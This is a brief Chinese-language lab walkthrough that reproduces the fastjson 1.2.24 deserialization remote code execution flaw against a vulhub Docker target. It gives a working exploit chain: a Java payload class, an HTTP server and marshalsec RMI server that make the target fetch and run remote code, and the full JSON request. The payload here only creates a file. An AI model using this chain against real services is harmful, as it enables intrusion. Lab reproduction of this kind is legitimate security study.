環境搭建:
sudo apt install docker.io
git clone https://github.com/vulhub/vulhub.git
cd vulhub fastjson 1.2.24-rce 目錄
啟動容器
sudo docker-compose up
HTTP訪問8090端口
靶機環境准備OK
准備payload
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
進行編譯成class文件
javac TouchFile.java
在對應目錄:
python -m SimpleHTTPServer 4444
使用https://github.com/mbechler/marshalsec.git搭建一個RMI服務器,進行遠程加載payload
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://10.10.202.130:4444/#/TouchFile" 9999
然后訪問HTTP服務器,進行payload構造
POST / HTTP/1.1
Host: 10.10.202.130:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 163
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://10.10.202.130:9999/TouchFile",
"autoCommit":true
}
}
測試即可。